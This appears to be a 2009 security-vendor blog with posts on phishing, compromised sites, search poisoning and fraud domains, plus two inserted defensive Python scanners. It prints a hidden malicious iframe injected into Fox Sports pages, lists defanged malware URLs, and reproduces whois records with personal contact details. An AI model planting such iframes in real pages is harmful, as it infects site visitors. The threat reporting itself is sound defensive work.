Wednesday, October 14, 2009

Fresh Twitter Phishing Campaign via Direct Messages and Tweets

A fresh Twitter phishing campaign is underway and is using both tweets and direct messages to spread. The messages contain text such as “hah, I think I seen u on here” and “wow you look different on here” together with a link to a video. The URL hxxp://videos.dskjkiuw.com is one of those being used. At this time, eSoft is not detecting malware or exploits on this domain, but the target page presents a good imitation of the Twitter login page in an attempt to steal credentials. As such, eSoft has flagged it as “Phishing & Fraud.” The Threat Prevention Team will keep a close eye on developments. Below is a series of screenshots starting with an example direct message and leading to the fake login page and the series of pages that come up after entering bogus username and password info.

Wednesday, October 7, 2009

Update on Fox Sports Website Infection

Quick update on this threat: as of today, 10/7/09, the Fox Sports website is still compromised. The specific URL, hxxp://msndr.foxsports.com/, has been cleaned, but any added nonsensical path results in a 404 page that still carries the malicious iframe to thingre.com. For example, hxxp://msndr.foxsports.com/dffdd returns a malicious page leading visitors to malware. eSoft has not received any response from Fox Sports, and the classification of the msndr.foxsports.com host remains "Compromised."

Monday, October 5, 2009

Millions At Risk Visiting Popular Sports Site

The Fox Sports website remains infected and a risk to the 6m+ visitors ([popularity data] as reported by Compete). This website, ranked as the 75th most popular website in the United States and 311th most popular in the World according to Alexa [popularity data], remains compromised and a major security risk to end-users. eSoft first reported on this threat on Friday, October 2nd, but was incorrect in saying that the infection was cleaned up. [Clarification: the specific pages eSoft examined were cleaned, but other pages have been discovered to still be compromised.] As of today, certain pages on the Fox Sports site remain infected. The eSoft team has written to the webmaster at Fox Sports (along with all contacts listed in their whois records) with some details that we hope will help their team clean up the website. When we hear back from them, we will post an update here.

Note that the malware being delivered through this threat remains undetected by the vast majority of anti-virus software. Also note that the compromised pages are being served through the Akamai network although at this time we believe the threat is specific to Fox Sports and not Akamai. Here is part of the email sent to Fox Sports by the eSoft team:

To Whom It May Concern:

eSoft has detected that your website, msndr.foxsports.com, remains infected with a dangerous, hidden iframe that links to a site that uses a variety of exploits to infect your website visitors with one of several rotating trojans. In particular, your 404 Page Not Found page on that server has the iframe right at the end of the HTML document immediately before the </body> tag. See attached screenshot. Unfortunately, eSoft cannot say how your site was compromised, only that it is compromised and the compromised pages are being served through your Akamai distribution network. At this time, eSoft has marked msndr.foxsports.com as a Compromised site and millions of end users are currently blocking access to the site based on that determination. Please let us know when you have corrected the issue so that we may unblock your site.


[Screenshot: foxsports.thingre.infection.png]

Friday, October 2, 2009

Foxsports.com Used to Serve Malware

eSoft's Threat Prevention Lab detected malicious code on the foxsports.com website late yesterday. Hackers have once again increased their tally of well known websites recently exploited to serve dangerous content.

The popular sports website was used to transparently redirect users to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site.

The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.



The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.
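A defender-side check for the kind of injection described above: the scanner below parses a page and flags iframes that combine a third-party host with a 1x1 size or a hidden style, the signature of the thingre.com iframe. This is an added example, not eSoft's tooling; the sample HTML is constructed to mirror the post, with the hosts defanged as in the text.

```python
"""Flag hidden or tiny iframes that point at hosts other than the page's own."""
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLES = ("visibility:hidden", "display:none")


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _is_tiny(value):
    """True for width/height values of 2px or less (the classic 1x1 frame)."""
    try:
        return int(str(value).strip().rstrip("px")) <= 2
    except ValueError:
        return False


def suspicious_iframes(html, page_host):
    """Return [(src, reasons)] for iframes showing at least two injection signs."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        # Defanged hxxp:// is mapped back so urlparse sees a normal URL.
        host = urlparse(src.replace("hxxp://", "http://")).hostname or ""
        reasons = []
        if host and not (host == page_host or host.endswith("." + page_host)):
            reasons.append("third-party host")
        if _is_tiny(attrs.get("width")) and _is_tiny(attrs.get("height")):
            reasons.append("1x1 size")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if any(marker in style for marker in HIDDEN_STYLES):
            reasons.append("hidden style")
        if len(reasons) >= 2:
            findings.append((src, reasons))
    return findings


# Constructed sample: a legitimate widget frame plus the injected frame from the post.
SAMPLE_HTML = """<html><body>
<h1>Hot Streak</h1>
<iframe src="http://msn.foxsports.com/widget" width="300" height="200"></iframe>
<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE_HTML, "foxsports.com"):
        print(src, why)
```

Requiring two signals keeps ordinary third-party widgets (ads, video players with real dimensions) out of the findings while still catching the 404 page variant, where the same frame sits just before </body>.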



The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant and the payload delivered last night is assumed to be more of the same. 

Monday, September 28, 2009

Blackhats Quickly Saturate Google With Tropical Storm Ondoy


Since tropical storm Ondoy hit the Philippine Capital on Saturday, attackers have wasted no time planting malicious pages claiming to host videos of the historic disaster. The city of Manila saw flooding on a level that hasn't been seen in decades and the pictures are jaw dropping. But for surfers looking to see those videos, searching on Google and following search results can be dangerous.

The actual attack is nearly identical to the attack reported last week where pages are artificially inflated in PageRank, driving them to the top of the search results. In one case, 8 of the 10 top results were found to be malicious. The actual malicious pages are only served up when users come from Google and at this time, anti-virus coverage for the installed malware is very low.

Many of these search results will take the user directly to a Fake AV download while others are more stealthy.

One of the more covert sites is hxxp://www.kolonne.nl/links/1/typhoon-ondoy-update.php. When opened using Google the user is shown the movie window with a play button. The play button is actually a link to hxxp://mycompscanner.com/download.php?id=169.



The user is prompted to install a missing "Active-X Patch" to view the video which leads them to the final payload, Fake AV software. There is no mention of anti-virus software and the user is led to unwittingly install the malicious file.

When Google search was not used to access the page the video image and link to the malicious download did not appear.

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

This is one of many trending search terms being targeted, including the few examples below.
  • Tim Tebow
  • Jenny Slate
  • Google Birthday
  • Roman Polanski
  • Yom Kippur

PageRank bombs using Google trending topics are one of the newest ways blackhats are spreading malware. The attackers are very responsive to the latest news and gossip, quickly posting new malicious sites to infect unsuspecting users.

Image Source: http://farm3.static.flickr.com/2555/3956145142_78422979bd.jpg

Monday, September 21, 2009

Google Users Targeted By New Malicious Websites

eSoft’s Threat Prevention Team has been tracking compromised sites that host PageRank Bombs since 2008. The attacker hacks a site, but instead of putting exploits on the hacked site, they put links to other websites in order to boost the search result ranking on various search engines. Initially this was being used for ad sites, porn sites, and pharmafraud sites. Now, however, it is being used to boost the results of malicious sites, but with a new twist that targets Google users.

The sites whose search engine ranking is being boosted are now serving up malware through a complex series of redirects. However, the redirects and the malware are only served up if the user gets to the site after clicking the link on Google. Going directly to the malicious site (by pasting the URL into your browser directly) results in a harmless page.

For example, using Google, a search for “nhl all-time scoring leaders” returns several malicious results on the first page (in the 5th, 6th, 7th, 8th and 10th positions). 



Going to the website, hxxp://adoptabeach.org/zzbtw/colzw/leaders.php, directly results in an innocuous page like this:



[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

However, clicking the link in the Google search results will bring the user to a web site using a common Rogue Anti-Virus template that alerts the user that their PC is infected and prompts unsuspecting users to download what is really a Trojan:



The Trojan being downloaded at this point has only a 7% detection rate by anti-virus software with Microsoft, NOD32 and Panda detecting.

Some of the sites being used include:
hxxp://shanthkherath.com
hxxp://adoptabeach.org
hxxp://advertising-made-easy.com

These redirect through some URLs including:
hxxp://skystats1.net/in.cgi?9
hxxp://skystats1.net/redirect2/
hxxp://jeremy-kyle-now.cn/go.php?id=2004&key=ff0057594&p=1

As far as eSoft’s TPT can tell, the referrer must contain the string google.com/search?q= and the User-Agent must indicate a Windows machine, or the malware will not be delivered. It does not appear that users of other search engines or operating systems are yet being targeted.
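The referrer and User-Agent gating described above is what makes a single direct visit look harmless. The check below, an added example and not eSoft's tooling, fetches a URL twice, once as a plain visitor and once as a Google-referred Windows browser, and reports the page as cloaked when the two bodies differ. The `fetch` callable is injected so the example runs offline against the constructed `fake_server`, which imitates the gating the post describes.

```python
"""Detect referrer/User-Agent cloaking by comparing two fetches of one URL."""
import hashlib
import urllib.request

# Constructed header sets: a non-Windows direct visit versus a Google-referred Windows browser.
PLAIN = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Gecko/20090910 Firefox/3.5",
    "Referer": "",
}
GOOGLE_WIN = {
    "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/3.5",
    "Referer": "http://www.google.com/search?q=nhl+all-time+scoring+leaders",
}


def http_fetch(url, headers):
    """Real fetcher (not used by the offline demo): GET url with the given headers."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def _digest(body):
    return hashlib.sha256(body).hexdigest()


def detect_cloaking(url, fetch):
    """Return (cloaked, plain_sha256, referred_sha256) for url.

    fetch(url, headers) -> bytes. Identical bodies mean no gating was observed.
    """
    plain = _digest(fetch(url, PLAIN))
    referred = _digest(fetch(url, GOOGLE_WIN))
    return plain != referred, plain, referred


def fake_server(url, headers):
    """Constructed stand-in for a gated page: serves the harmless body unless
    the request looks like a Windows user arriving from a Google search."""
    if "google.com/search?q=" in headers.get("Referer", "") and "Windows" in headers.get("User-Agent", ""):
        return b"<html><body>[constructed rogue-AV landing page]</body></html>"
    return b"<html><body><p>NHL all-time scoring leaders ...</p></body></html>"


def honest_server(url, headers):
    """Constructed control: the same body regardless of headers."""
    return b"<html><body>same content for everyone</body></html>"


if __name__ == "__main__":
    print(detect_cloaking("http://example.invalid/leaders.php", fake_server))
    print(detect_cloaking("http://example.invalid/leaders.php", honest_server))
```

A byte-for-byte hash comparison also fires on legitimately dynamic pages (rotating ads, timestamps), so on live sites compare the set of outbound script and iframe hosts rather than the raw bodies.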

Wednesday, September 9, 2009

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a massive amount of recently exploited websites, all redirecting to Rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs.  According to VirusTotal [http://www.virustotal.com/analisis/23c06523d4b5cf2c9e853bb5e7a20916e5246e81a17a39b9aad3f2f86056defd-1252440943], only two of forty-one anti-virus companies are currently detecting the malware. 

Credit also goes to Edgar (http://edetools.blogspot.com) who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).

hxxp://aljassmy.com/music/html/bmblog/britney-spears-chocho-a-lo-locco/.


Upon visiting the site, an obfuscated JavaScript file redirects the visitor to one of several sites that host the malware payload. Multiple redirect domains are being used to further obfuscate the final destination, and all of these are currently flagged as malicious by eSoft (most have been set to malicious for over a week).

Unprotected users will see a pop-up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompted to download the supposed cure, which is in fact the malware. This scheme is all too common, and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August. This latest campaign appears to be the most widespread to date.


The malware payloads change often and anti-virus detection is lagging behind. eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.

Friday, August 28, 2009

Chinese Scams Resurface with New Branding

The Threat Prevention Team has found thousands of URLs and over 200 new domains registered to a group of Chinese scammers. The new sites are the same as the old, but with new branding and promotional products, such as "Acai Power Slim", "Pure Magnum Pro" and "Colo Cleanse Plus". This scam is perpetrated by sending spam messages advertising a "free trial" of the products. In the end, the criminals have made off with personal information, a credit card number and a recurring monthly charge.

Here is an example of an “Acai Power Slim” site. The pages are filled with bogus testimonials, citations from CBS and ABC News and clinical research. Also note the pressure to sign up for the "risk free trial."

As you dig through the site, you'll notice any meaningful way to contact the site owners has been removed. An email form is present which presumably will never be answered. All of the domains found match the previous pattern and have been registered to Chinese ownership.

DomainName : appleaboard.com

Creation Date ..................2009-08-19
Last Update Date ...............2009-08-24

Registrant Name .................FANG JUN
Registrant Organization .........FANG JUN
Registrant Address ..............JIANGYANGBERILI13
Registrant City..................YY
Registrant Province/State .......HN
Registrant Country Code .........CN
Registrant Postal Code ..........414039
Registrant Phone Number .........+86.073051421473
Registrant Fax ..................+86.073051421473
Registrant Email ................hiuaxiang@163.com

Expect to see an increase in spam associated with these domains over the next several weeks as the scammers attempt to lure people to these sites. eSoft is detecting these sites as "Phishing & Fraud."

Here is a sample list of the recently registered domains:
  • appleaboard.com
  • easyalong.com
  • fasterdevelop.com
  • pureacaisolution.com
  • sunnyact.com

More information on this scam is available on Wikipedia http://spamtrackers.eu/wiki/index.php/Acai_Power_Slim

Wednesday, August 26, 2009

New Rash of Fraud Sites Touting Cheap Software

eSoft is researching a widespread and dangerous ring of fraudulent "OEM Software" distribution sites. These sites offer popular software from Microsoft, Adobe, and many other vendors at a greatly reduced price. Not only do they not deliver installable software, they collect sensitive information from individuals, including credit card numbers.

eSoft has identified over 11,000 of these web pages so far.

While these sites may look real, touting Microsoft and Verisign certifications, they are far from legitimate. Many of these sites come back as top results in Google and Yahoo searches. Alarmingly, many URL filters are NOT able to detect and block these sites.

Here is just one example of the many sites currently up and running. 

The company name given on many of these fraudulent sites is "OEM Downloads Inc", “Authorized Software Reseller” or “Download Software”. You can check for this at the bottom of the page where there is often a copyright notice. Throughout the sites there are tell-tale signs that this is a shady website that should not be trusted.

Straight from their FAQ..."you will not receive any printed documentation (licensing or instructions) - just files and instructions in .txt format, and will not be able to register this software online." This was the company's explanation for the low prices they are able to offer. If you are not able to register the product, it is not a real copy or you won’t be getting it in the first place.

Another sign is that they are offering Adobe Creative Suite software on the site. Adobe does not distribute or allow OEM distribution of their software. In fact, OEM software is rarely sold outside of a hardware bundle, like a new computer system.

Unsurprisingly, the whois information shows Russian ownership for most of these domains. For example:

------------------------------

WHOIS – COMPUTERCODEPLANET.COM

   Domain Name: COMPUTERCODEPLANET.COM
   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.ENCATGPC.COM
   Name Server: NS2.ENCATGPC.COM
   Status: ok
   Updated Date: 20-jul-2009
   Creation Date: 06-jan-2009
   Expiration Date: 06-jan-2010

Registrant:
         Valery Rigalo vrigalo77@inbox.ru +7.4999384712
         N/A
         Novomariinskaya str., 11/1, apt. 38
         Moscow,N/A,RU 193901


Domain Name:computercodeplanet.com
Record last updated at 2009-01-06 12:08:08
Record created on 2009/1/6
Record expired on 2010/1/6


Domain servers in listed order:
         ns1.encatgpc.com        ns2.encatgpc.com

------------------------------

The Threat Prevention Team has also noticed that many compromised sites, including some government and educational sites, are linking back to these domains. This further substantiates the criminal intentions of these fraudsters. eSoft is flagging these URLs as “Phishing & Fraud.”

Friday, August 21, 2009

Mass Compromise of Sites with Webalizer

The eSoft Threat Prevention Team has been tracking a rapidly growing pattern in website exploits over the last 24 hours. Since Thursday, Aug 20, eSoft has seen over 6,000 compromised URLs of the pattern:

http://www.example.com/webalizer/050709wareza/crack=28=keygen=serial.html

And the numbers are growing at a rate of several hundred per hour. A Google search for inurl:050609wareza shows around 30,000 such compromised sites.

The compromised sites typically have nonsense text and a series of pictures of pills with links to more compromised sites and dangerous scripts that trigger well known exploits including the recent exploit of the ActiveX streaming video control, discussed in this eSoft security bulletin:

http://www.esoft.com/alerts/cve-2008-0015.cfm.


In some cases, such as when eSoft researchers tried navigating to a compromised site using Firefox on Windows, a redirection to files express occurs:


In testing, when the exploit is successful, it seems to be an information stealing Trojan, though the payload has varied. As the payloads seem to have weak coverage by AV companies and seem to be changing frequently, blocking the offending websites is the best solution for preventing infection.

eSoft’s Threat Prevention Team notes that around 1/3 of the compromised sites include a webalizer directory, which may indicate a correlation with a recently published webalizer exploit. This exploit allows an attacker to execute arbitrary code, often with elevated privileges. More information on this exploit can be found at the link below. It is recommended that administrators configure webalizer to not do reverse DNS lookups until a patch is released.

http://linuxdevcenter.com/pub/a/linux/2002/04/16/insecurities.html


eSoft will continue to cover this threat and to protect customers from these websites by flagging them as Compromised. At the start of research, Google had very few of these sites flagged as malicious, but it seems that increasing numbers are being identified by their cloud security as well. Other security engines tested, including Web of Trust, Norman, and McAfee SiteAdvisor, have very poor detection of these sites at this time.